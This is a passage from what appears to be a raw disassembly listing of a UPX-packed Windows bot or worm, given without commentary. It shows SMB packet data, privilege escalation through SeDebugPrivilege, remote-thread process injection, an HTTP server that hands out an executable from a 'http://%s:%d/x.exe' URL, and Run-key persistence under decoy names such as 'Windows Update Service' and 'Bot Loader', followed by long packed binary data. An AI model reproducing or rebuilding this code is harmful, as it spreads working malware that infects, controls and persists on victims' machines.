dword_31424A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31424A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31424B00 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31424BBE dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31424BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_31421801+41B�o
; sub_31421801+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_31424C70: ; DATA XREF: sub_31421801+44A�o
jmp short loc_31424C78
; ---------------------------------------------------------------------------
jmp short loc_31424C7A
; ---------------------------------------------------------------------------
align 8
loc_31424C78: ; CODE XREF: UPX0:loc_31424C70�j
; DATA XREF: sub_31421801+5C�o
pop esp
pop esp
loc_31424C7A: ; CODE XREF: UPX0:31424C72�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31424C84 dd 1CEC8166h dword_31424C88 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31421D68+62�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31421D68+39�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31421D68+2A�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31421D68+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31421D68+8�o
; sub_314223B2+12C�o
align 10h
aUterm19 db 'uterm19',0 ; DATA XREF: sub_31421DF0:loc_31421ED5�o
; UPX0:31422351�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31421DF0+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31421DF0:loc_31421E37�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31421DF0+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31421DF0+18�o
align 4
dword_31424D38 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3142207E+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_3142207E+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:3142233C�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_314223B2+133�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_314223B2+125�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_314223B2+11E�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_314223B2+111�o
align 4
aU19x db 'u19x',0 ; DATA XREF: sub_314223B2+BD�o
align 4
aU19 db 'u19',0 ; DATA XREF: sub_314223B2+B6�o
aU18 db 'u18',0 ; DATA XREF: sub_314223B2+AF�o
aU17 db 'u17',0 ; DATA XREF: sub_314223B2+A8�o
aU16 db 'u16',0 ; DATA XREF: sub_314223B2+A1�o
aU15 db 'u15',0 ; DATA XREF: sub_314223B2+9A�o
aU14 db 'u14',0 ; DATA XREF: sub_314223B2+93�o
aU13i db 'u13i',0 ; DATA XREF: sub_314223B2+8C�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_314223B2+85�o
aU12 db 'u12',0 ; DATA XREF: sub_314223B2+7E�o
aU11 db 'u11',0 ; DATA XREF: sub_314223B2+77�o
aU10 db 'u10',0 ; DATA XREF: sub_314223B2+70�o
aU9 db 'u9',0 ; DATA XREF: sub_314223B2+69�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_314223B2+62�o
align 4
aU18x db 'u18x',0 ; DATA XREF: sub_314223B2+5B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_314223B2+54�o
align 4
aU16x db 'u16x',0 ; DATA XREF: sub_314223B2+4D�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_314223B2+46�o
align 4
aU14x db 'u14x',0 ; DATA XREF: sub_314223B2+3F�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_314223B2+38�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_314223B2+31�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_314223B2+2A�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_314223B2+23�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31422712+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_314221C4+23�o
; sub_314229E6+66�o ...
align 4
aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_314221C4+1C�o
; sub_31422A9B+87�o ...
align 10h
aFgnsdrjyrsert db 'fgnsdrjyrsert',0 ; DATA XREF: sub_314215C7+4F�o
; sub_31422B67+57�o ...
align 10h
dd 2 dup(0)
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31422B67+32�o
aClient db 'Client',0 ; DATA XREF: sub_31422B67+BC�o
; sub_31422B67+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_31422B67+37�o
; sub_31422B67+75�o
align 10h
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_314229E6+55�o
align 10h
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_314229E6+4E�o
align 10h
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_314229E6+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_314229E6+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_314229E6+39�o
align 10h
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_314229E6+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_314229E6+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_314229E6+24�o
align 10h
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_314229E6+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_314229E6+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_314229E6+F�o
align 4
a1: ; DATA XREF: sub_31422B67+B7�o
unicode 0, <1>,0
dd 7 dup(0)
dword_31424FE8 dd 0 ; sub_314221C4+80�w
dword_31424FEC dd 0 ; sub_314216A2+53�o ...
dword_31424FF0 dd 0 ; sub_3142207E:loc_3142212C�r ...
dword_31424FF4 dd 0 ; UPX0:3142235C�w ...
dword_31424FF8 dd 0 ; sub_314223B2+CE�w
dword_31424FFC dd 0 ; sub_31422712+20�r
dword_31425000 dd 31420000h ; UPX0:31422341�w
dword_31425004 dd 0 ; sub_314216A2+4A�o ...
dword_31425008 dd 0 ; UPX0:314227C1�w
word_3142500C dw 0 ; DATA XREF: sub_3142255F+3B�r
; sub_314225C3:loc_31422624�r ...
align 10h
dword_31425010 dd 0 ; sub_31422B67+110�w
align 1000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31426000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31426000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:31427BB1�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h
dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h
dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h
dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72570100h
dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h
dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h
dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h
dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h
dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h
dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h
dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h
dd 72457473h, 726F72h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h
dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h
dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh
dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h
dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh
dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h
dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h
dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 0C8000201h
dd 40D859h, 0
dd 0E0000000h, 0B010F00h, 601h, 26h, 12h, 34000000h, 23h
dd 10h, 40h, 314200h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 60h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 34000000h, 8C00002Dh, 15h dup(0)
dd 7C000010h, 1, 5 dup(0)
dd 2E000000h, 74786574h, 56000000h, 24h, 10h, 26h, 4, 2 dup(0)
dd 20000000h, 2EE00400h, 61746164h, 14000000h, 10h, 40h
dd 10h, 2Ah, 2 dup(0)
dd 40000000h, 0C00000h, 3C000050h, 0C300002Fh, 0A1000054h
dd 89254BBEh, 0DB43AA85h, 0AEF070A0h, 92A2047Dh, 4EC00F3Ch
dd 27BE81Ch, 8402F26Ah, 47FC7D1Bh, 0F0024A19h, 0A033E402h
dd 2164868h, 0D2B735D7h, 0A73D7D03h, 769F6801h, 36E6CCE6h
dd 3A4A2064h, 1B5AB7CCh, 0DC87B734h, 6A7684E0h, 96F42A70h
dd 0E6C8E38Ch, 5EC86080h, 7A97640Ah, 273E1B25h, 0A2280084h
dd 364B003Fh, 3CD9B96Bh, 98B9B26Ch, 0E477BDE2h, 0DC016754h
dd 317E500Fh, 0C777C3E4h, 0AC683B0Dh, 0D328C00Dh, 0B138CEDCh
dd 0E56F08C9h, 0DB0C7A04h, 0D2484522h, 0DD2DC5F8h, 0D61B212Fh
dd 402EDB1Ch, 67012DEh, 4C9039ECh, 40BCF844h, 0C27190D6h
dd 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh, 67E9ACF9h
dd 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h, 1CF25B07h
dd 96F41276h, 899DE9C3h, 940AEF65h, 7BC87C6Ah, 64B1E3C3h
dd 0C9BE490Ch, 991DD97Bh, 90E154E4h, 8C9FE924h, 0DCCCC349h
dd 0CF78242Eh, 2C8248EDh, 0F864052Ch, 66F4150Ch, 3319A002h
dd 8707A23h, 8F895E74h, 0F4C6DD0Eh, 1C51CC5Fh, 80B3EF9Ch
dd 7F24E4A1h, 5A435A8h, 0B5D0781Bh, 571282F8h, 5A745737h
dd 0ACBF931h, 74F80E14h, 9A0684Bh, 0CA28B753h, 2D3D74CEh
dd 67ED85C9h, 0A0412069h, 0FFC55FFh, 35BAB9E8h, 50E49ED7h
dd 0E9628ACh, 5B3002F0h, 5547BF4Dh, 8C0009F8h, 681583E4h
dd 0F475583Bh, 1887EE42h, 851321C5h, 0A90A508Bh, 0BFF77FB6h
dd 3C418B2Fh, 68C10357h, 488B4D2Ch, 50788B34h, 0A0F44D89h
dd 0EE062AB4h, 1C68D84Bh, 5D97D81Bh, 0F0F559AAh, 868D201h
dd 0C18DEC12h, 0ED74C3B1h, 1110D70Dh, 0F46F0E82h, 1409B26Ah
dd 0F84DF123h, 91762C51h, 18185085h, 892A6897h, 6C54A0E9h
dd 0CA405DB0h, 46C0ED03h, 0EB346B63h, 9AAB1930h, 596ED578h
dd 37DF055h, 0AB6745E6h, 0F03EDD4Bh, 53503151h, 9E0AC1Eh
dd 0F435C4F7h, 17FAD6BDh, 3FEA6D6Ah, 5577D0F1h, 74C73BECh
dd 1BEB5805h, 5AE57E17h, 25348CBFh, 5FC0E59h, 36E7345Fh
dd 740807EBh, 0E1FC58EFh, 5F521E86h, 602F5151h, 0B269310Fh
dd 5C91A144h, 0BAB8250Dh, 0DD20DB42h, 0B213B1AFh, 1133AEECh
dd 2D590FEBh, 0B66AF9C2h, 99EDC4B1h, 0C803CBCh, 1450A850h
dd 7D2774D6h, 5DC02C50h, 4459FC19h, 437C20BAh, 247C8B57h
dd 0A5C58314h, 7E11D25Ah, 641A8717h, 803FFFF5h, 148861C2h
dd 0F73B461Eh, 2480E97Ch, 0C68C003Bh, 54D5D6DBh, 5F2E448Bh
dd 5657AC5Ah, 30181DDBh, 2F216674h, 8896DC73h, 50F02EEDh
dd 565019h, 3C3ACAAh, 9577E134h, 49F44DC4h, 8F6B6E8Ch
dd 0F00CFA68h, 0C908C7FFh, 349B6996h, 2E2ACC34h, 99AD734Ch
dd 0A0A75EDh, 1A20BC50h, 3E160118h, 7C654A1h, 13B7FB8h
dd 0ADF1CE74h, 8B0C407Dh, 51080100h, 5F24448Dh, 9B613421h
dd 0D31130C5h, 74245903h, 7F84EE8h, 7BBCC15h, 662FC820h
dd 3333C7FBh, 0C1F8C8E4h, 0B8510E7h, 4679B0D4h, 8B0200B6h
dd 33125Dh, 0F3702647h, 19DC201h, 53C4EAC9h, 0A311E3C6h
dd 0F2B57B35h, 0C3255035h, 26B69D83h, 0ADE74880h, 40666CB5h
dd 41F0179Eh, 0BB683595h, 98CEE331h, 0B76C683Dh, 474FF044h
dd 19B1606Ch, 0A54D54FEh, 2CC5D314h, 7C54DADCh, 0FC0DFE00h
dd 33A134BAh, 2B7900B9h, 72C13BC7h, 72C18B02h, 0E1EBB76Fh
dd 0E8A1292Bh, 23C70318h, 0FE25A3ACh, 233DCC96h, 786A1172h
dd 0DA3140F8h, 0C4EB3C28h, 7750E113h, 6CF64F26h, 941ED411h
dd 0CD3C6815h, 0BEE4D62h, 97386803h, 9D663E3Ch, 54533AB5h
dd 0D0835253h, 8C47E0B1h, 4C29824h, 136D8223h, 0E643098h
dd 0E8D0B1F7h, 8C316D4h, 0BBEE4E29h, 89574377h, 80686806h
dd 27841D89h, 5D4F7E18h, 14EC6DA2h, 0F2D4C0h, 0C1345391h
dd 27B6B6Ch, 80EB3A01h, 9AD468E6h, 1A4DFD77h, 0B34A3678h
dd 0DCCD2F74h, 677A5EA3h, 0A3650C75h, 53FCA4FEh, 1AD9D251h
dd 3A865613h, 0DC3E68D8h, 2656D88Ch, 58195EF9h, 0F8DA6A12h
dd 5E0510C2h, 0EF4B56C0h, 0C6697A4h, 0EC5D89E8h, 0DFFF050Dh
dd 25EDF760h, 3A041FFFh, 43FCA3C3h, 8A1FE774h, 5FC984CCh
dd 74E849BDh, 0EA6B50DFh, 64405F42h, 0A51985BAh, 440C6465h
dd 2BE9AFA3h, 14F85F7Bh, 9E481FD8h, 0FACEADECh, 15207E68h
dd 0E2EB624Eh, 5CC1CF53h, 455FE142h, 0AC019043h, 70661D7Bh
dd 0B0333CAEh, 0D30711D6h, 23EDB43h, 803AD6E6h, 9B0D0AF9h
dd 0ABB068B4h, 74E063A3h, 822B01D8h, 0F4A37B7Ch, 8609D9FBh
dd 0B73DE4CDh, 29E04552h, 0EECDF670h, 1904640Dh, 68631BE2h
dd 0EC1323B2h, 5C344FB5h, 1386EB13h, 0B06099AEh, 3569FB1Ah
dd 397044F8h, 90252C40h, 0D2908F93h, 70CDC864h, 90458C13h
dd 9406EF5Ch, 72391C54h, 9C4C98E4h, 0A43CA044h, 47239134h
dd 0AC2CA88Eh, 391CB024h, 0B4C8E472h, 0BC14B818h, 9F0CC010h
dd 0C41C8E47h, 0CC04C808h, 0F8D04DFCh, 2391C8E4h, 0F0D8F4D4h
dd 85AEECDCh, 0E8E07239h, 487E4E4h, 8B66BDh, 0A36CD337h
dd 0B978DADEh, 2FCB06Dh, 7309838Ch, 0EC8C3412h, 415C0376h
dd 4A8D9085h, 0EB0CFF59h, 4D8D1AE8h, 0B40DE438h, 0C9391A5Ch
dd 870BF07Ch, 0D4683974h, 37A8AB4Dh, 0B6326277h, 0C4064DCCh
dd 843E0D6Dh, 9ABC4984h, 4E570465h, 2ADB3B72h, 0A341521h
dd 276E16A2h, 41173E3Ah, 5F9A2842h, 7D21E014h, 0F818B4E8h
dd 0EB9C1388h, 0C28242E3h, 5A159993h, 1B6095AFh, 63554703h
dd 0DE7FA480h, 0AD11F0AAh, 0B458A51h, 32FF6A9Eh, 80C1EDDBh
dd 0CC3A52C3h, 0DC5D3831h, 0F108FE3Ah, 0B5D8825h, 0FFD07D2h
dd 5A0C35B7h, 0F80CFF59h, 0F7990F93h, 8ED603FEh, 0FB80C3FEh
dd 2ED572FFh, 5EBDC65Bh, 5F7662BAh, 9813B264h, 68336F04h
dd 56DA0958h, 81084F38h, 0C70D040Ah, 9DB59B0h, 80758F0Bh
dd 609B492Dh, 5FF90F75h, 1E892C25h, 3D9DADE4h, 3FF8432h
dd 0FB8143D7h, 0B50DBE71h, 5F9F9623h, 6BA65D87h, 7B4F3B16h
dd 6DA25A73h, 0E6573C19h, 9973002Fh, 0FDBE78B7h, 0F6FEFF04h
dd 61887F3Ch, 33FC6C5Bh, 88BF50Fh, 0AADCF33Bh, 0D8B3B276h
dd 57A0A33Eh, 9C572F9Eh, 2259ED9h, 1359F8D6h, 256E25C3h
dd 0B3BBFF0Eh, 0C3F2EE75h, 68E1AC8Eh, 0D3A62710h, 969ED3BEh
dd 84C1C180h, 50A92D70h, 1052AD62h, 8FC2454Eh, 0BA6032F5h
dd 0F2AA5C6Ah, 0E0F9DCDFh, 0BFC3A4Ch, 6468B003h, 372DD4Eh
dd 11103B06h, 0D742BA27h, 6CE012F7h, 0B80C609h, 0B02B39DFh
dd 556F0BB0h, 84579356h, 80CC78D8h, 5113E6D8h, 68661C4Dh
dd 0FD1F0CA5h, 0D91462F4h, 538906EEh, 20BF661h, 838506Ah
dd 0A05BFDAFh, 0D2052C5Dh, 18740096h, 73071109h, 1001478Dh
dd 141905h, 9DD8513h, 1706D84Fh, 42BDAA0Eh, 74F081DBh
dd 0C7D5530Dh, 0BE111051h, 392101E1h, 3A18244Ch, 7EED85EDh
dd 0D876D811h, 264BA586h, 0EF144D2Ch, 6C192596h, 0EBA20577h
dd 8B750DF2h, 65B8B076h, 68FADDEBh, 0C11B333Fh, 968160C8h
dd 77D0150Ch, 6EA96236h, 90140810h, 2F874BA3h, 5618D951h
dd 0D8D85CFCh, 0F61837B2h, 743D563Eh, 6311CE05h, 61412ADCh
dd 0B74B2C9Ch, 102050D3h, 59030818h, 0AA0B62FCh, 8B550F5Eh
dd 5ACEE1C6h, 2E33A257h, 56532C56h, 0C9901884h, 25270055h
dd 5ACE5903h, 40C520Ah, 9262CF20h, 28AF5D0Ch, 89E2B701h
dd 21DE53C3h, 948E694Eh
dd 13F6F438h, 5C1E3C34h, 0F7794E36h, 43ADDE04h, 281D146Ch
dd 687AA42Dh, 92C1EC35h, 0F4D85A2Dh, 22F40910h, 0CF203BD0h
dd 0EEF8367Ah, 477D221Dh, 11E748Dh, 0F556FC7Bh, 4804C1FEh
dd 0B5FF1C1Eh, 0B9B345E0h, 0FF452F20h, 8521F0Fh, 61C35760h
dd 1C465033h, 3489BD76h, 0B733A074h, 57D6A93Ch, 0D91B1C8h
dd 984FACB6h, 1C80D406h, 0D8E47239h, 0E06CDC74h, 9148E460h
dd 0E88E4723h, 0F020EC3Ch, 1934D110h, 0B700F4CCh, 63BF0B84h
dd 647CE261h, 8B7EF9BEh, 0A16451A2h, 0B4C43D18h, 0CBD83608h
dd 0E177572h, 0A64D1D49h, 2A099E9Ah, 0BDA3833Eh, 8A460975h
dd 7888E044h, 8C47F46Ah, 0B40974B0h, 6A885974h, 8BB38163h
dd 84BCDE59h, 7A2F22A1h, 0E0833FC1h, 5C08303h, 86B9CD57h
dd 0FD594A8Bh, 509D10CFh, 3D12186Eh, 1C3DD607h, 0E26EE66h
dd 50E83F14h, 982CEF42h, 2040A261h, 4B7CCA41h, 0D7C63F68h
dd 0CC59B306h, 1B41D986h, 0CFA125D3h, 0B801F454h, 9681E007h
dd 9F8B0F40h, 3EC18817h, 481FC517h, 5FD14C7h, 25596D30h
dd 0E0B3BA10h, 0BF501D6Ah, 86103DD8h, 51FC71F0h, 1537743Fh
dd 31583A06h, 60A7BB0Ah, 0BEFD8A06h, 0F45352D1h, 7EE6BC3Dh
dd 3D53D8B3h, 0FEBB138h, 0A0C1CE59h, 0B632BDB3h, 38DE1B68h
dd 65E265B0h, 0C868C226h, 5B373B4Fh, 0BB46D1F6h, 971A0DB9h
dd 41D60B35h, 4C125E12h, 7A4EC6F0h, 0C631EE4Ah, 0B6413BBBh
dd 2CFD90CCh, 90B610B5h, 480718B7h, 6015EB0Ch, 2D1880E5h
dd 0AF1909CDh, 5132BA1Eh, 44330C5Dh, 0EC5B3D50h, 6A7D6883h
dd 0CC401113h, 0F42A66E7h, 2806FF00h, 0A910F805h, 0F49199EFh
dd 51001BF0h, 8DF7DF9Bh, 723B8D1Ah, 0BE98114h, 0AD85042Dh
dd 1B1FDBEh, 2BEC7317h, 0CC48BC8h, 88BE18Bh, 0B5B236EAh
dd 4353A302h, 45055C64h, 58363605h, 0A2000049h, 0F1022C02h
dd 8F34BF14h, 52240206h, 80314153h, 0B77FFFFFh, 0F501018Fh
dd 7911838Dh, 0E42AEC52h, 49E7F63Ah, 0BEE0EA9Bh, 7EDB21AFh
dd 0FFFA9544h, 5E1AFFFFh, 85A03261h, 949F6A1Fh, 843994FFh
dd 358F26A6h, 0A55C1DCEh, 7AB20BC9h, 0FF307265h, 371FFFFFh
dd 697A6F4Dh, 2F616C6Ch, 20302E34h, 6D6F6328h, 69746170h
dd 3B656C62h, 0FFFD4D20h, 4953FB5Bh, 15362045h, 6E695709h
dd 73776F64h, 20544E20h, 29312E35h, 0D40BBB3Dh, 8EE434h
dd 0C40104D4h, 0CF3DF7B4h, 90A00EF3h, 68047480h, 3CF3CF0Eh
dd 480958DFh, 30D4743Ch, 64D937CFh, 10222045h, 0ED00304Ah
dd 0F83E437Fh, 76631340h, 75722E76h, 0BDB6367Eh, 70077B5h
dd 976C6465h, 0C1660F65h, 0FF7B7FF2h, 61657365h, 0E686372h
dd 626F721Fh, 6863786Fh, 0DB676E61h, 0D2B9BB7Fh, 0C74651Fh
dd 622E6472h, 61007A69h, 85D86328h, 6B68E46Dh, 740C6D61h
dd 24782D06h, 0B9BB6DB3h, 6F6C0600h, 6B37620Eh, 0BEF6FD47h
dd 276266Dh, 76742E7Ah, 6F74111Bh, 856E2E70h, 178C2D80h
dd 27730F69h, 80FF0B33h, 0F788D6Dh, 6C756461h, 4B652D74h
dd 7EDB7669h, 338072B3h, 73A66E6Fh, 622E744Eh, 0DF0AC07Dh
dd 67694F67h, 77780032h, 5B7FB361h, 626A2CFBh, 9B00AD62h
dd 6166617Ah, 0F84887A8h, 655D2EB6h, 61AF5C23h, 0F6EDF862h
dd 656463FFh, 69686766h, 6D6C6B6Ah, 7271C56Eh, 777675F7h
dd 0FFC67978h, 650E50DFh, 46454443h, 4A494847h, 4E4D4C4Bh
dd 5451504Fh, 0FF68C3FFh, 57565554h, 1B5A5958h, 74746823h
dd 2F2F3A70h, 3B9BF025h, 2F0B73B0h, 702E9765h, 7B3F7068h
dd 0EB6FB7Eh, 73260F3Dh, 64066E63h, 666E6926h, 29073B76h
dd 313D7DB7h, 74132639h, 58EBA01Bh, 60F6BBFBh, 3732313Dh
dd 3A3101A8h, 2F303038h, 80FFDF65h, 0DFEC8Dh, 335DDFE8h
dd 0EEB966C9h, 0FFDB6FFFh, 5758D01h, 68AFE8Bh, 4607993Ch
dd 46302C06h, 7889934h, 0EBEDE247h, 0E8342FF7h, 7EDAE80Ah
dd 2E6765DFh, 0C9999371h, 0DFFFEF01h, 0BDFD12FEh, 716FD91h
dd 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 1A98A91Ch, 0F75BB1FFh
dd 0F198F3C9h, 71028608h, 5F9010C0h, 599237CBh, 0F931C96h
dd 3A78B3FBh, 7157E414h, 713A0A7Dh, 0BEFB9D45h, 0F19DF3EDh
dd 0F1098904h, 40119C04h, 0FD8EEDB3h, 0E3F36723h, 0DC1C10F0h
dd 6059B20Bh, 3D8FC99Bh, 125EFF6h, 0A10414D9h, 9E71CA17h
dd 61688D2Bh, 964617B3h, 0E21AAD91h, 28111D96h, 0ED6F6D9Fh
dd 0C850B2h, 57DC1499h, 4E122555h, 0DFECC0A4h, 1291EDDEh
dd 0F7ED9949h, 0C4140054h, 71CBCA3Ah, 87B31C3Bh, 24FFFDDDh
dd 0CF1A21E4h, 668FCDCDh, 0FBB6812Ch, 1E3F6C9Fh, 83B8B0FBh
dd 5D12CDC3h, 1DCBC9A8h, 6F9DB27Fh, 0B24AD25h, 96A6485Ah
dd 0C9FECBC0h, 4C1B1464h, 0F3EBA729h, 0D9FFBA9Ch, 16E9B3F7h
dd 7126F434h, 0F90EFCF5h, 29EF133Bh, 6FFF6B46h, 5F37F776h
dd 0EC4766DEh, 116A0A8h, 0EDFFC5B7h, 0FDE9ECE9h, 0EF610FBBh
